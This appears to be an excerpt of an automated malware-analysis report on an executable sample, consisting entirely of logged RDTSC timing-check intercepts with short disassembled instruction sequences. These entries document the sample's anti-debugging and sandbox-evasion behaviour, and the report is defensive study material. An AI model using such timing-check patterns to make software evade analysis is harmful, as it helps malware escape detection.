Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1679F8E second address: 1679F9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1679F9C second address: 1679FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F10C4816DF6h 0x0000000a jg 00007F10C4816DF6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161FC8D second address: 161FC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161FC91 second address: 161FC97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 167A674 second address: 167A678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 167A678 second address: 167A691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816DFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 167B00F second address: 167B018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 167B018 second address: 167B05C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F10C4816E07h 0x00000010 jmp 00007F10C4816E05h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 167B05C second address: 167B067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F10C4818116h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16834F0 second address: 168351E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F10C4816DFCh 0x0000000e push edi 0x0000000f jmp 00007F10C4816E05h 0x00000014 pop edi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 168351E second address: 1683526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16815B5 second address: 16815D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816E08h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1681A23 second address: 1681A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1681D27 second address: 1681D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1682315 second address: 168231F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F10C4818116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16825D8 second address: 16825E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F10C4816DF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1682B8B second address: 1682B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1682B92 second address: 1682B97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16831BC second address: 16831C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16872CB second address: 16872D5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10C4816DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16872D5 second address: 16872E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F10C4818116h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16872E1 second address: 16872E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 168667F second address: 168669A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4818127h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 168669A second address: 168669E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 168669E second address: 16866AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F10C4818116h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16866AE second address: 16866B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F10C4816DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686C25 second address: 1686C42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818126h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686C42 second address: 1686C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686DAF second address: 1686DE0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F10C4818116h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jnp 00007F10C4818122h 0x0000001c jo 00007F10C4818116h 0x00000022 jo 00007F10C4818116h 0x00000028 pushad 0x00000029 js 00007F10C4818116h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686DE0 second address: 1686DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686F6C second address: 1686F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686F70 second address: 1686FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F10C4816E03h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10C4816E06h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16935A7 second address: 16935AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169173A second address: 169173E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169173E second address: 1691755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818123h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691755 second address: 1691775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F10C4816E07h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16918D3 second address: 16918D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16918D7 second address: 16918E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16918E4 second address: 16918F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F10C4818116h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16918F0 second address: 16918FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F10C4816DF6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691E8F second address: 1691E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691E96 second address: 1691ECF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F10C4816DFEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10C4816E04h 0x00000012 jmp 00007F10C4816E00h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16921AD second address: 16921B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16921B3 second address: 16921B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16921B8 second address: 16921C5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F10C4818118h 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1692302 second address: 169230B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1692617 second address: 1692625 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691330 second address: 1691335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691335 second address: 1691348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C481811Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691348 second address: 169134C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169A489 second address: 169A4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F10C4818122h 0x0000000a popad 0x0000000b push esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169A73E second address: 169A744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169A744 second address: 169A761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jp 00007F10C4818116h 0x0000000c ja 00007F10C4818116h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F10C4818116h 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15D9286 second address: 15D92EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F10C4816E04h 0x00000013 jmp 00007F10C4816DFBh 0x00000018 jmp 00007F10C4816E09h 0x0000001d push esi 0x0000001e pop esi 0x0000001f popad 0x00000020 jnl 00007F10C4816E0Fh 0x00000026 jmp 00007F10C4816E07h 0x0000002b push edi 0x0000002c pop edi 0x0000002d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169BF77 second address: 169BF89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ch 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E9F03 second address: 15E9F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jbe 00007F10C4816DF8h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F10C4816DFDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E9F22 second address: 15E9F28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E9F28 second address: 15E9F3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15DE410 second address: 15DE43D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F10C4818125h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15DE43D second address: 15DE443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B3252 second address: 16B3283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F10C481811Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F10C4818116h 0x00000012 jmp 00007F10C4818127h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B3283 second address: 16B329F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F10C4816DF6h 0x00000008 jmp 00007F10C4816DFBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B2E0F second address: 16B2E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B913B second address: 16B9140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B9140 second address: 16B914A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F10C4818116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B914A second address: 16B914E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B914E second address: 16B9162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jnp 00007F10C4818118h 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16C3A7C second address: 16C3A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16C3A82 second address: 16C3A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16C9FBE second address: 16C9FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16C9FC2 second address: 16C9FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F10C481811Ah 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007F10C4818116h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16C9FDE second address: 16C9FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA245 second address: 16CA26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F10C4818116h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F10C4818128h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA26C second address: 16CA270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA270 second address: 16CA276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA276 second address: 16CA280 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F10C4816DFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA535 second address: 16CA539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16CA97D second address: 16CA9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F10C4816DF6h 0x0000000a popad 0x0000000b jl 00007F10C4816DFAh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jbe 00007F10C4816E08h 0x0000001b jmp 00007F10C4816E02h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F10C4816E06h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D0F7F second address: 16D0F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D0F85 second address: 16D0F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D0F8C second address: 16D0FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F10C4818116h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F10C4818120h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F10C4818125h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f push ebx 0x00000020 js 00007F10C4818116h 0x00000026 ja 00007F10C4818116h 0x0000002c pop ebx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D0FD4 second address: 16D0FD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D114A second address: 16D114E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D114E second address: 16D1154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16D1154 second address: 16D1181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F10C481811Eh 0x0000000e jmp 00007F10C4818125h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1712267 second address: 171226C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 171226C second address: 1712271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1712271 second address: 1712277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1712277 second address: 171227F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E4F52 second address: 15E4F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F10C4816DFDh 0x00000008 jns 00007F10C4816DF6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 jmp 00007F10C4816DFDh 0x00000017 jns 00007F10C4816DF6h 0x0000001d pop ecx 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 pop eax 0x00000025 jl 00007F10C4816DF6h 0x0000002b jnc 00007F10C4816DF6h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E4F94 second address: 15E4F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1717AED second address: 1717AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1717AF3 second address: 1717B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F10C481811Ch 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F10C481811Dh 0x00000014 jmp 00007F10C4818128h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c jmp 00007F10C481811Dh 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jp 00007F10C4818116h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1717B48 second address: 1717B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
